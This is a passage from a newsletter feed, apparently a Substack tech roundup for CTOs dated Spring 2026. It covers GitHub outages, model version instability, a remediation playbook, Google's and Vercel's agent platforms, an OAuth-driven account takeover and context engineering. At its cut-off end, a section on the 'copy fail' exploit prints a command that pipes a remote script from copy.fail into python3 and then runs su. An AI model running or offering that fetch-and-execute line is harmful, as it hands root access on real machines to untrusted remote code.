width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div><hr></div><h4 style="text-align: center;">part 2: <a href="/__u/ctolunchnyc.substack.com/p/horse-and-buggy-software">Horse and Buggy Software</a></h4><div><hr></div><p style="text-align: center;"></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://ctolunchnyc.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Subscribe to CTO Lunch NYC</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p style="text-align: center;"></p>]]></content:encoded></item><item><title><![CDATA[CTO Lunch NYC🪻Spring 2026]]></title><description><![CDATA[Tech Roundup for CTOs, CAIOs and CDAOs]]></description><link>https://ctolunchnyc.substack.com/p/cto-lunch-nyc-spring-2026</link><guid isPermaLink="false">https://ctolunchnyc.substack.com/p/cto-lunch-nyc-spring-2026</guid><dc:creator><![CDATA[Forest Mars]]></dc:creator><pubDate>Mon, 04 May 2026 19:30:51 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!syrX!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a3d4223-7b84-452e-aedb-a67fe7e6fe3b_1448x1086.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>While NYC CTOs were sitting down for lunch together at a 117 year old bar</strong> in Manhattan, Nvidia GTC (GPU Technology Conference) in San Jose&#8212;where the nearest <a href="https://ctolunches.com/">CTO Lunch</a> chapter is Norcal, which meets in SF&#8212;was wrapping up after an astounding 621 sessions across 3 languages, and Jensen Huang had just done his Vera Rubin victory lap in his trademark leather jacket (the kind you used to see everywhere in NYC and now only see on stages) for hardware that won't ship until Q4 at best, meaning 2027 if you're not AWS or Microsoft. And thirty thousand people gave him a standing ovation for a product announcement. (Well a lot of them did.) </p><p>If you were lucky enough to have been in both places (honestly it's only luck if you score a whole row on the redeye back in time for lunch) you'd notice the same conversation taking place in both venues; namely, the realization that the stack is destabilizing at every layer simultaneously, CTOs saying that most organizations are still acting as if that&#8217;s purely a procurement problem rather than an operational one.</p><blockquote><p>You&#8217;re flying 2,500 miles to make it to a lunch where people are complaining about the exact same things you just heard in Silicon Valley.</p></blockquote><p>Nearly coinciding with our last lunch, and 40 blocks away, a Vercel employee connected a third-party agent app to their corporate Google account and discovered (the hard way) exactly how much of enterprise security was built around the assumption that the person on the other end of the credential was a person.</p><p>From Jensen&#8217;s victory lap for an architecture that isn&#8217;t shipping yet to the Google Cloud Next keynote quietly declaring that the entire modern data stack was built for the wrong user; from <a href="https://eblog.fly.dev/githubbad.html">Github&#8217;s growing fascination with service degradation</a> to Anthropic&#8217;s moving all the furniture around when no one&#8217;s looking, to OpenAI&#8217;s product line changes and departures, to the surprising (or not so surprising) blast radius of a single Vercel employee connecting a single OAuth app to their corporate Google account; sideways seemed to be the preferred direction this quarter. (Well, not the S&amp;P 500 and NASDAQ Composite, obvi.) </p><p>But none of these are unrelated incidents. They&#8217;re all dispatches from the same saga, and they share the same structural underpinnings. The emerging (agentic) stack is destabilizing and being destabilized at every layer simultaneously: infrastructure, models, governance, tooling, and the shared world models that hold all of it together. </p><div class="pullquote"><p>IN THIS ISSUE<br><a href="/__u/ctolunchnyc.substack.com/i/196170387/its-her-token-factory">It&#8217;s Her (token) Factory</a><br><a href="/__u/ctolunchnyc.substack.com/i/196170387/we-need-to-talk-about-github">We Need to Talk about Github</a><br><a href="/__u/ctolunchnyc.substack.com/i/196170387/moving-the-furniture-in-real-time">Moving the Furniture in Real Time</a><br><a href="/__u/ctolunchnyc.substack.com/i/196170387/enterprise-agentic-stack-arrives-which-one">The Enterprise Agentic Stack Arrives</a><br><a href="/__u/ctolunchnyc.substack.com/i/196170387/context-is-king-for-a-day">Context is King (for a day)</a><br><a href="/__u/ctolunchnyc.substack.com/i/196170387/rsc-y-business">RSC-y Business</a><br><a href="/__u/ctolunchnyc.substack.com/i/196170387/calypso-colapso">Colapso</a></p></div><h2><strong>It&#8217;s Her (token) Factory</strong></h2><p><strong>Last year we mapped the five-tier value chain of AI and noted that only Tier 1 </strong>was <a href="/__u/ctolunchnyc.substack.com/p/turning-sand-into-money">making real money</a>. Each tier theoretically capturing margin by adding differentiation, one tier actually doing it, the rest playing hot potato  as the model showed signs of becoming featurized while the infrastructure around it was becoming the business. But all that&#8217;s last year already; you were just apprised in advance. </p><p>Just 2 days before aforementioned lunch, Jensen Huang stood on that stage in San Jose to kick off those astonishing 621 sessions (tbc: it was the number that was astonishing; a number of sessions were not necessarily so) and took his victory lap for Vera Rubin, which is not shipping yet. </p><p>What actually shipped was <strong>Magic Attention</strong> and <strong>Warp Specialized Attention</strong>. In essence, both are variants on the barnyard bromide &#8220;all tokens are equal but some are more equal that others.&#8221; Magic Attention routes compute dynamically based on token relevance, the silicon now sorting signal from noise at inference time rather than brute-forcing the whole context window. Warp Specialized Attention goes lower still, down to the 32-thread atomic unit of GPU execution, parallelizing the attention kernel itself (query, key, value, output all running concurrently) to not just push back, but structurally eliminate the memory tax bottleneck every serious inference workload has to pay (the bandwidth bottleneck between GPU compute and GPU memory.)</p><p>If the room understood what that meant, Jensen wouldn&#8217;t have needed the leather jacket. (There&#8217;s a reason NYC CTOs don&#8217;t really wear those anymore.)</p><p>What it means is this: the data center used to be a warehouse. You bought capacity, held it, served against it. Overprovision, autoscale, cache aggressively, pray your worst-case concurrency assumptions held. It&#8217;s how we&#8217;ve always done it. <strong>Inference breaks that abstraction at the foundation</strong>. Tokens enter as raw material. Inside the system they are culled, recombined, and amplified with highly uneven expenditure of compute. Most of the input is not preserved but consumed in the act of producing the output. The <em>transformation</em> is the product. What matters is not how much state you can hold but how efficiently you can drive that transformation under hard constraints: latency, bandwidth, power, cost, SLOs. Which is a factory dynamic, not a warehouse. </p><div class="pullquote"><p>The data center used to be a place for files. It&#8217;s now a factory for tokens.</p></div><p>Historically, capacity planning assumed a relatively stable relationship between input and compute. That relationship is gone. Inference workloads are nonlinear, context-sensitive, and shaped by attention mechanisms your procurement team has never heard of and probably won&#8217;t understand. And the organizations still treating this as a warehouse problem, or procurement, still capacity planning, still autoscaling against static assumptions, are running factory economics through warehouse math.</p><p>Because the value has shifted (accordingly): not to whoever owns the largest static artifact, but to whoever runs the most efficient transformation pipeline across hardware, runtime and orchestration.</p><h2><strong>We Need to Talk about Github</strong></h2><p><strong>To run efficient pipelines, though, you need stable infrastructure, but what exactly is going on over at GitHub these days?</strong> Just since our last newsletter they have averaged an incident per day, no cap. And if you showed me the shambolic status bars for Anthropic and GitHub side-by-side, I&#8217;d be hard pressed to even say which was which, tbh, with a number of Github incidents being high severity and in at least one case a CVSS 8.7 remote code execution.</p><p>It got so bad Mitchell Hashimoto started keeping a journal (Mitchell is GitHub user #1288,  signed up in 2008; the year of my very first talk on Git + Mongo, FWIW.) He&#8217;s been logging incidents for months and the data is&#8212;as we say&#8212;brutal:  37 incidents in February; 28 in March; 23 in April. One Merge Queue bug silently reverted commits across 658 repositories and 2,092 PRs. April 28 brought CVE-2026-3854, CVSS 8.7, remote code execution in the internal git layer, with 88% of GitHub Enterprise Server instances still unpatched at last count. If you&#8217;ve been wondering whether the degradation you&#8217;ve been noticing is serious or exaggerated, he brought the receipts.</p><p>Zig migrated to Codeberg in December, which registered as a warning shot at the time and got filed away as one project&#8217;s idiosyncratic preference. I mean, it&#8217;s Zig, right? But Mitchell announcing Ghostty was following suit was the dam bursting.</p><blockquote><p><em>The Copilot revenue story is genuinely good. The platform reliability story isn&#8217;t, and the two are arguably not coincidental.</em></p></blockquote><p>But Microsoft is pouring its engineering attention into Copilot features while the underlying platform accrues the kind of (quiet) degradation that&#8217;s inappropriate for a product announcement and rarely makes it into any documentation surface at all. This concern has a particular weight right now because IaC has become the mandatory backbone for scaling AI systems and multi-cloud architectures, and the transition already underway is pushing it further toward autonomous, self-healing environments where policy and intent drive the architecture rather than static, human-written configuration. </p><p>Terraform (or Tofu, post-IBM acquisition) plans that a human reviews before applying are giving way to systems that continuously reconcile desired state with actual state. Less like an OODA loop and more like homeostasis. The more autonomy you push into the infrastructure layer, the more the platform running your pipelines, your repos, your CI/CD has to be something you can actually depend on.</p><p>GitHub degrading precisely as IaC matures toward autonomy is &#8220;no coincidence&#8221; but is a compounding problem with a compounding cost: the more your infrastructure drives itself, the more catastrophically it fails when the platform underneath it doesn't.</p><h2><strong>Moving the Furniture in Real Time</strong> </h2><p><strong>The Gartner Hype Cycle has always been a useful fiction, but it used to at least hold </strong>still. It now feels less like a cycle and more like someone rearranging the furniture while you&#8217;re sitting on it. In the dark. While billing you for the privilege.  CTOs aren&#8217;t the only ones tripping over it, but they&#8217;re the ones expected to explain the bruises at the next board meeting. Doubly so, if you&#8217;re fractional. At lunch, the conversation keeps circling back to the same uncomfortable realization: the capability you validated in Q1 is not the capability you&#8217;re running in Q2. And Q3 is days away. </p><p>Although Opus 4.6 (released Q1) didn&#8217;t draw the extremely vocal dissatisfaction for coding as it was met with in the writers community, it actually regressed on SWE-Bench. When Opus 4.7 arrived (same vendor, same product line, one release cycle) and drew the kind of vocal, sustained dissatisfaction that&#8217;s genuinely hard to achieve in a market that can&#8217;t stop praising everything (worse than GPT-5 launch, impressive in the wrong direction!) it broke the foundational assumption most shops had bought into: that newer means better. Nope. Not predictably. Not reliably. Not structurally. Treating this as a fluke rather than a pattern is the more expensive mistake, btw. </p><p>The loyalty churn compounds this. One month Claude Code is your team&#8217;s golden goose. The next it&#8217;s nerfed and Codex is back. Tool loyalty in this space has more back-and-forth than the US Open final. And then there&#8217;s that one guy on the team who insists Gemini CLI is best, but never seems to be able to articulate why beyond personal preference. (The worst part is he might be right by the time this goes to print.) You thought you were standardizing on a tool; you were renting one mid-identity crisis.</p><p>None of this has a name yet, which ofc is part of the problem. Model (and harness) instability as an infrastructure risk class is real, consequential, and eating engineering hours across the industry, but it doesn&#8217;t have the vocabulary that would force it onto a risk register. It needs a line item in the workbook.</p><p>Your ersatz leading indicator is the quality of your engineers&#8217; Slack complaints. (Because that&#8217;s obviously a lagging indicator.) More specifically: the proliferation of workarounds, the tool-switching that doesn&#8217;t go through approval, the browser extension shipped to another team to automate clicking &#8220;continue.&#8221; (We won&#8217;t talk about the Javascript that got passed around to automate watching mandatory HR trainings.) When your team is scripting around vendor rate limits at that speed, you&#8217;re not reading a leading indicator, you&#8217;re already en route to a post-mortem. </p><h3><strong>The Stack Beneath the Model Is Also Moving</strong></h3><h5><em>Stability is not a feature. It&#8217;s a tax you pay somewhere.<br></em></h5><p><strong>It&#8217;s not just model mayhem. Although models are not as predictable as they once were</strong> (<em>if you&#8217;ll forgive me the expression.</em>) The jump in token usage from 4.5 to 4.6 was noticeable but then Opus 4.7 arrived with a near-quadrupling of token usage on identical prompts. This showed an industry rule of thumb, that you could estimate cost from prompt structure, even as prompts were growing in cost, wasn&#8217;t nearly as reliable as was previously thought. And it wasn&#8217;t thought to be so reliable to begin with. We&#8217;re back to guessing at quality, latency, and cost simultaneously. </p><p>Everything underneath is moving at the same time, and the regression surface is larger than most teams have mapped. At the SaaS product layer (Claude Code; Codex; Gemini CLI, I guess) you get model plus harness plus UX, bundled, with no meaningful changelog. You are effectively QA for a product you don&#8217;t control. Unpinned APIs offer maximum volatility with minimum warning; you&#8217;re opting into drift whether you know it or not. Pinned APIs give you fixed weights, but the surroundings (system prompts, safety filters, retrievers) are still fluctuating on vibes. Self-hosted open weights hand you the regression surface you always wanted: yours, entirely, to debug at 2am. (Congratulations. Hope you like kernels.) None of these options are clean; all of them are hiding costs somewhere.</p><p>Anthropic shipped approximately 50 updates in 52 days (impressive velocity or an admission of instability, depending on your blood pressure). Tool call limits dropped silently from roughly 80 per turn to somewhere between 10 and 20. Peak-hour throttling became normalized across all tiers, with dedicated sites now cataloging the outages. OpenAI&#8217;s version is more theatrical: A Sora announcement with considerable fanfare was followed by the entire project being killed the next day, the team blindsided, Disney finding out about the billion-dollar partnership cancellation with under an hour&#8217;s notice. The head of OpenAI for Science likewise making a huge product announcement the day before he drops his suspiciously effusive severance-compliant farewell. Three of their top execs announcing their unplanned departures late on a Friday with extremely polite goodbye posts doing a lot of legal work. The through-line is the same in both cases: if their own teams don&#8217;t have a stable roadmap, your own roadmap which includes them as a dependency is hitched to a runaway process. </p><div class="callout-block" data-callout="true"><p style="text-align: justify;">Then there&#8217;s the irony nobody at lunch can quite stop laughing at. Dario Amodei is publicly arguing we no longer need programmers and we won&#8217;t need software engineers much longer. Meanwhile Anthropic can&#8217;t hold two nines of uptime. Maybe <em>they</em> don&#8217;t need software engineering; CTOs still do.</p></div><p>The honest answer on what to do fits in two points<strong>.</strong> <strong>Internal evals</strong> are the only signal you actually own: continuous, workload-specific, and running before you need them, not after. <strong>Open weights</strong> are the architectural escape hatch; real stability and real control in exchange for real infrastructure responsibility, and not as expensive as they used to be relative to what proprietary instability is now costing. And the calculus is moving fast enough that neither option is dismissible; both paths are unstable in different ways, both are improving rapidly, and choosing without acknowledging this is how you write the next case study. Or maybe yours will be a success story. (If you implement the recommended playbook, following.) </p><div><hr></div><h2><strong>CTO Playbook: 30/60/90</strong></h2><h4>Model Version Pinning Audit (HIGH PRIORITY - 30 days):</h4><ul><li><p>Enumerate all production LLM calls across services (grep codebase, inspect API gateways, trace outbound requests). Extract: provider, model name, version/snapshot, invocation path. Identify any calls without explicit snapshot pinning and any references to deprecated snapshots (e.g., <code>20250514</code>). Replay a fixed prompt set (&#8805;50 representative prompts) against current vs latest model versions to measure token count variance and output drift.</p><ul><li><p><strong>Measure:</strong> % unpinned calls, deprecated snapshot usage count, token delta distribution (p50/p95), output diff rate.</p></li><li><p><strong>Deliverables:</strong> versioned model inventory (service &#8594; endpoint &#8594; model &#8594; snapshot), deprecation remediation list with owners, token cost variance report on fixed prompts, CI/CD rules to reject unpinned snapshots (backlog).</p></li></ul></li></ul><h4>OAuth Access Audit (HIGH PRIORITY - 30 days):</h4><ul><li><p>Query all OAuth integrations via admin APIs (Google Workspace, GitHub, Slack). For each app: pull scopes, install date, last access timestamp, associated users/services. Cross-reference with IAM to identify service accounts vs human users. Validate scope necessity against actual API usage logs. Revoke tokens for unused apps (&gt;30 days inactivity) and any app without mapped owner.</p><ul><li><p><strong>Measure:</strong> total OAuth apps, % with unused scopes, % without owner, number of high-risk scopes (write/admin).</p></li><li><p><strong>Deliverables:</strong> OAuth registry table (app_id &#8594; scopes &#8594; owner &#8594; last_used &#8594; risk_score), revocation log, list of over-scoped apps with required scope reductions, access review sign-off.</p></li></ul></li></ul><h4>GitHub Dependency Mapping (HIGH PRIORITY - 30 days):</h4><ul><li><p>Extract all GitHub-dependent workflows (Actions YAML, webhooks, Packages pulls, Pages deployments). Build dependency graph: service &#8594; workflow &#8594; GitHub feature. Chaos day: Simulate failure by disabling Actions in staging or blocking api.github.com egress. Record pipeline failures, deployment blocks, artifact fetch errors.</p><ul><li><p><strong>Measure:</strong> number of critical workflows dependent on Actions, mean time to failure under outage simulation, % of pipelines without fallback.</p></li><li><p><strong>Deliverables:</strong> dependency graph (DAG format), outage impact matrix (workflow &#8594; failure mode &#8594; severity), list of single points of failure, remediation backlog (mirror, cache, or decouple).</p></li></ul></li></ul><h4>Continuous Evaluation System: (MEDIUM PRIORITY &#8212; 60 days):</h4><blockquote><p><code>Reference implementation</code><strong>:  <a href="/__u/buildai.substack.com/p/continuous-eval-with-harbor">Continuous Evaluation with Harbor</a></strong></p></blockquote><ul><li><p>Implement continuous evals for Prod LLM and agent workflows using Harbor as  execution layer. Goal: run ongoing, reproducible evaluations on real production traces to detect model drift, agent degradation, and tool-use failures. Sampling, dataset construction, evaluation execution, and CI-triggered runs should follow the Harbor continuous eval workflow.</p><ul><li><p><strong>Measure</strong>: pass/fail rate per workflow, semantic drift vs baseline, output variance %, agent tool-use success rate.</p></li><li><p><strong>Deliverables</strong>: Harbor-based continuous evaluation system, versioned production trace datasets per workflow, CI-triggered evaluation runs, regression dashboard across model and agent performance, rollback thresholds tied to observed regression.</p></li></ul></li></ul><h4>Repository Failover (MEDIUM PRIORITY - 60 days):</h4><ul><li><p>Set up secondary Git host. Mirror repositories using scheduled sync. Replicate access controls and deploy keys. Reconfigure CI pipelines to support alternate git remote. Execute controlled failover: switch origin, trigger build, validate artifact production and deployment.</p><ul><li><p><strong>Measure:</strong> sync lag (seconds), failover time (minutes), % pipelines passing post-failover.</p></li><li><p><strong>Deliverables:</strong> mirrored repos with sync automation, documented failover runbook, successful failover test logs, rollback procedure.</p></li></ul></li></ul><h4>Pipeline Monitoring Decoupling (MEDIUM PRIORITY - 60 days):</h4><ul><li><p>Implement external monitoring (e.g., cron-based or event-driven) to poll pipeline endpoints and artifact availability independent of GitHub. Inject synthetic transactions (trigger builds, verify completion via API). Route alerts through independent channel (PagerDuty, etc.). Simulate GitHub outage by blocking API access and confirm alert triggers.</p><ul><li><p><strong>Measure:</strong> alert latency under failure, % pipelines with coverage, false negative rate in simulation.</p></li><li><p><strong>Deliverables:</strong> monitoring service w coverage map (pipeline &#8594; monitor), alerting config, outage simulation report with detected vs missed failures.</p></li></ul></li></ul><h4>Model API Stability Policy (QUARTERLY OKR - 90 days):</h4><ul><li><p>Define enforcement rules: all model calls must include explicit snapshot/version; fallback chains must be explicit and logged. Implement static analysis (lint rule or CI check) to reject unpinned model usage. Add runtime logging for model selection, fallback invocation, and version drift. Schedule review cadence aligned to vendor release cycles.</p><ul><li><p><strong>Measure:</strong> % compliance with pinning policy, number of fallback events per week, time-to-detect version drift.</p></li><li><p><strong>Deliverables:</strong> policy document, linting/CI enforcement rules, logging schema for model usage, weekly drift report.</p></li></ul></li></ul><h4>GitOps Host Abstraction Assessment (QUARTERLY OKR - 90 days):</h4><ul><li><p>Audit deployment system (Flux/ArgoCD/etc.) for hardcoded GitHub dependencies (URLs, auth, webhook triggers). Test multi-source configuration with secondary Git host. Attempt full environment sync from non-GitHub source. Identify blockers (auth, tooling assumptions, pipeline coupling).</p><ul><li><p><strong>Measure:</strong> % of workloads deployable from alternate host, number of GitHub-specific dependencies, time to switch source.</p></li><li><p><strong>Deliverable:</strong> architecture assessment (component &#8594; dependency), list of GitHub-coupled elements, implementation plan to achieve host abstraction.</p></li></ul></li></ul><h4>Open Weights Evaluation (QUARTERLY OKR - 90 days):</h4><ul><li><p>Select candidate open-weight models. Deploy locally or in VPC. Run same eval dataset as API models. Measure inference latency (cold/warm), throughput (req/s), infra cost (GPU hours), and output quality vs baseline. Test operational constraints: scaling, failure recovery, model reload times.</p><ul><li><p><strong>Measure:</strong> cost per 1K requests, latency p50/p95, output quality delta vs API baseline, ops overhead (engineer hours/week).</p></li><li><p><strong>Deliverable:</strong> benchmark report (API vs open-weight), infra cost model, performance comparison charts, recommendation on scope of adoption.</p></li></ul></li></ul><div><hr></div><h2><strong>Enterprise Agentic Stack Arrives (which one?) </strong></h2><blockquote><p><em>&#8220;We&#8217;re no longer thinking about human personas like data scientists. <br>We&#8217;re thinking about agents as the persona.&#8221;</em></p></blockquote><p>We&#8217;ve talked before about the <a href="/__u/ctolunchnyc.substack.com/i/178040240/rip-the-modern-data-stack">collapse of the modern data stack</a>. It&#8217;s now collapsing from an entirely new pressure, or rather the same source previously identified, now felt at production scale. The entire modern data stack, dbt, Fivetran, the warehouse underneath it, the BI layer on top, was architected around human-paced consumption, the assumption that the user is a human that&#8217;s baked into every abstraction layer in the stack. While it may seem obvious that, if agents are the user class now, that&#8217;s a lot of infrastructure built for the wrong person, why did it take someone saying this from a big enough stage&#8212;last week at Google Cloud Next in Las Vegas&#8212;for enterprise architects to respond? That&#8217;s a rhetorical question, obvi. </p><p>Gemini Enterprise Agent Platform (GEAP&#8253;) is Google&#8217;s theory of where the response goes: Agent Studio, Agent-to-Agent Orchestration, Agent Registry, Agent Identity, Agent Gateway, Agent Observability. Agent Identity. Their naming as fun and un-subtle as ever. But notice what&#8217;s sitting inside that stack: Agent-to-Agent Orchestration isn&#8217;t a proprietary Google feature. It&#8217;s built on A2A, the Agent-to-Agent Protocol that Google originated and then donated to the Linux Foundation, which just hit its one-year mark with over 150 supporting organizations (incl. AWS, Microsoft, Cisco, IBM, Salesforce, SAP, and ServiceNow) with production deployments across supply chain, financial services, insurance, and IT operations. Microsoft has embedded it in Azure AI Foundry and Copilot Studio. AWS shipped support through Bedrock AgentCore Runtime. This isn&#8217;t a Google platform. This is a standards moment, and it happened while everyone was watching the cloud keynotes.</p><p>A2A/MCP pairing is a sharper way to see the stack taking shape. A2A defines how agents communicate and coordinate across organizational boundaries. MCP, <a href="/__u/forestmars.substack.com/p/nine-days-in-a-one-year#:~:text=On%20this%20particular%20Tuesday%20OpenAI%20donated%20AGENTS.md%20to%20the%20Linux%20Foundation.">also now a Linux Foundation project</a>, defines how agents connect to internal tools and data sources. Together they form a two-layer foundation for multi-agent systems that don't require a single-vendor approach. The interoperability problem, the one that was going to generate years of proprietary lock-in fights, has a potential answer.</p><p>Google's bet, on top of that foundation, is that governance has to be enforced before an agent touches anything, at the control plane, below the application layer, the same way IAM is enforced before a human touches anything, with observability and policy baked in. By the time an agent is inside your application boundary, in this theory, the governance window has already closed. Their 8th gen TPU inference pod (1,152 TPUs, 3x on-chip SRAM, built to run millions of agents concurrently) is the hardware for the world this theory requires. </p><div class="pullquote"><p><em>The same week Google announced Agent Identity as a foundational infrastructure primitive, Vercel shipped Next.js 16.2 and called it &#8220;agent-native.&#8221;</em></p></div><p>Vercel&#8217;s theory is that the application layer is where agent intelligence should live, embedded in runtime context, version-matched documentation, and direct application observability, rather than governed from infrastructure below. The agent doesn&#8217;t need an identity primitive if it never leaves the application boundary.</p><p>Next.js 16.2 ships AGENTS.md into every new project: a file that redirects agents from stale training data to version-matched documentation bundled directly in node_modules. Vercel ran the evals. AGENTS.md hit 100% on Next.js tasks. Skills-based approaches maxed out at 79%, because <a href="/__u/forestmars.substack.com/p/mad-skills">skills</a> require the agent to recognize when to invoke them, and in 56% of eval cases it didn&#8217;t. Always-available context beats on-demand retrieval, which is a finding with implications well beyond Next.js. next-browser goes further: terminal access to a running application, screenshots, network requests, console logs, React component trees, all returned as structured text an agent can reason about without touching a browser UI. The agent sees what the application is doing in real time. </p><p>Which one of these visions is right about where agents actually live and who governs them? Vercel is building from the application layer down: AGENTS.md plus bundled docs that make your agent an expert in the exact version of Next.js it&#8217;s running, a purpose-built browser tool for frontend debugging and optimization, a framework that treats the agent as a first-class runtime citizen.  (Mitchell Hashimoto, fresh from keeping GitHub&#8217;s incident journal, just joined the Vercel board. The open source infrastructure world is quietly reorganizing around a specific architectural thesis, and that&#8217;s where he placed his marker.)</p><p>Google's answer to that question is that the application layer is too late. Agent Identity in the Gemini stack isn't a feature you bolt on after deployment, it's a primitive, enforced at the control plane before an agent is permitted to act; the same way IAM governs humans before they touch anything. Agents in this model are credentialed, scoped, and auditable from the infrastructure layer up. The six-product announcement (Studio, Orchestration, Registry, Identity, Gateway, Observability) is not a product suite. It's a governance stack, and the sequence is deliberate: you don't get to Orchestration without Identity, you don't get to Observability without Gateway. </p><p>Google is arguing that the blast radius of an ungoverned agent isn't an application problem. It's an infrastructure problem, and infrastructure problems require infrastructure solutions. A2A v1.0 ships Signed Agent Cards, cryptographic identity verification baked into the protocol itself, which is as explicit as a spec gets about where the project thinks identity has to live.</p><div class="pullquote"><p><em>Then the Context AI incident happened, and the debate got a lot more concrete.</em></p></div><p>A Vercel employee downloaded a third-party agent app, connected it to their corporate Google account via OAuth, and the chain unraveled. Account takeover. Internal system access. Unencrypted credentials exposed. Context AI, for its part, did its best to treat this as a footnote. </p><p>The only irony is structural. Agent Identity, the piece Google announced as a foundational infrastructure primitive and the <strong>piece the broader A2A ecosystem just shipped a cryptographic answer for, is the hardest unsolved deployment problem in the agentic stack, and here is exactly what it looks like when it fails in the wild.</strong> At the company that shipped AGENTS.md. Against a protocol that had the answer in the spec. It just didn&#8217;t make it into the deployment. </p><p>Google is probably right that Agent Identity needs to be solved at the infrastructure layer. The industry just ratified Google's bet in the form of an open standard. Vercel just ran the proof of concept for why it matters. The question for every CTO in the room is which failure mode you're currently exposed to, and whether you've priced it. That's the work <strong>Agentic Reliability Engineering</strong> (ARE), if we're naming the discipline, actually does.</p><h2><strong>Context is King (for a day) </strong></h2><blockquote><p><strong>Context Engineering isn&#8217;t a discipline. It&#8217;s a symptom. </strong></p></blockquote><p>We used to treat context as something systems carried. That day is gone. The interesting question is why context is king, and the answer is less flattering than the royal sloganeering implies. Context is king because it forgets. Every agent session starts from nothing, no memory of last Tuesday's decision, no awareness of the exception carved out in February, no institutional knowledge of any kind. The context window is finite, ephemeral, and when the session ends, the kingdom falls. You rebuild it tomorrow. Context is king for a day because that's all the reign it gets. </p><p>The reason this is even possible to say out loud, the reason context and meaning are so tightly coupled that losing one destroys the other, traces back to <a href="/__u/substack.com/home/post/p-195944246#:~:text=The%20great%20and%20tragically%20forgotten%20Zelig%20Harris">Zelig Harris</a> and the distributional hypothesis: meaning is literally a function of context, not a property of tokens. That's the insight that made all of modern NLP possible, and it's also the source of the problem. If meaning is context-dependent all the way down, then systems that drop their context don't just forget. They become incoherent.</p><p>This is what's underneath the term "context engineering" that's been circulating lately. It's not a discipline. It's a symptom. It's what software architecture looks like when the model is the runtime, amnesia is a default system behavior, and the response is to hire someone to manage the forgetting more carefully. Every layer of abstraction eventually collapses under the weight of implicit state. We've been here before. We just called it state management, and we had better tooling for it. </p><div class="pullquote"><p>If you liked configuration drift, you're gonna love context drift. </p></div><p>Context drift is the actual enemy, and none of the current standard-issue responses actually fight it. Prompt engineering is muscle memory for a problem that has moved on. RAG pipelines are transitional fossils &#8212; useful, not sufficient. Carefully curated embeddings are a partial answer to a question that keeps getting bigger. None of them solve the core problem: every tool call, every intermediate step, every partial output introduces entropy into the system's understanding of what's going on. The more agents you add, the less predictable the system becomes &#8212; not because the models are worse, but because the shared world model is dissolving. </p><p>Neo4j Labs shipped <code>uvx create-context-graph</code> earlier this year, and Context Hub (<code>chub</code>) is the delivery vehicle that lets agents build and query a local context graph: persistent, local-first, queryable. The mechanical description is accurate and misses the point entirely. What <code>chub</code> is actually doing is operationalizing something the industry has been hand-waving for months: context isn't a prompt, it's a topology. Agents aren&#8217;t the recipients of context; they traverse it, mutate it, and occasionally corrupt it. CLI scaffolding is support for the moment the pattern morphs from whitepaper to <code>make install</code>. (We moved from CRA to Vite, and then from Vite to turbopack. It keeps getting faster.) What React did for front-end state, this is trying to do for agent cognition, but without the luxury of pretending the state is local, ephemeral, or internally consistent. </p><div class="pullquote"><p>The next generation of systems won't be defined by how they process tokens, <br>but by how they stabilize context across time. </p></div><p>This is the shift from stateless intelligence to stateful coherence, and it represents an architectural inversion that hasn't fully landed yet. The old model: models at the core, data as input, context as wrapper. Call it MDC. The emerging model inverts it: context as core, data as one of many context sources, models as interchangeable operators. (CDM) The model isn't the thing anymore. The context layer is. At the upper echelons of enterprise, where the word travels more slowly, the realization is arriving that competitive advantage isn't about having the best fine-tuned model. It's about building, maintaining, and querying a high-fidelity context layer. Which, if you're keeping score, is basically a speedrun of the "it's the data, not the models" revelation from the MLOps era. History doesn't repeat, but it does maintain a context graph. </p><p>The master/emissary phenomenon <a href="/__u/forestmars.substack.com/p/vibe-codings-paper-anniversary#:~:text=understood%20as%20a%20negotiation%20between%20master%20and%20emissary">we've talked about before</a> applies here with particular force: capability has scaled faster than coherence, which means you have ambiguity operating at two distinct levels simultaneously; in the latent space of the models and in the shared world model dissolving across agents. Are you starting to see why there's a billion dollars pointing at the world model problem? Are you starting to get the sense of just how fast that train is moving, based purely on the singular convergence of attention across the top tech corridors &#8212; everyone talking about the same thing without quite knowing it, united in opposition to system entropy? Context graphs are the first serious attempt to fight that entropy at the architectural level. Not a passing of the crown. &#128081; A regime change from within. </p><div class="callout-block" data-callout="true"><p>&#10077; Take away the context and the meaning also disappears. When you perceive intelligently&#8230; you always perceive a function, never an object in the set-theoretic or physical sense. &#10078;</p><p style="text-align: right;">&#8212; Stanislaw Ulam, quoted by Gian-Carlo Rota in &#8216;Indiscreet Thoughts&#8217;</p></div><h2><strong>RSC-y Business</strong></h2><h5><em>The security perimeter was always a fiction maintained by the friction of human operations.<br><br></em></h5><p>Let&#8217;s talk about copy fail. [<a href="https://copy.fail/#exploit">https://copy.fail/#exploit</a>] Or, actually, let&#8217;s just run it: </p><pre><code><code>% curl https://copy.fail/exp | python3 &amp;&amp; su
% id
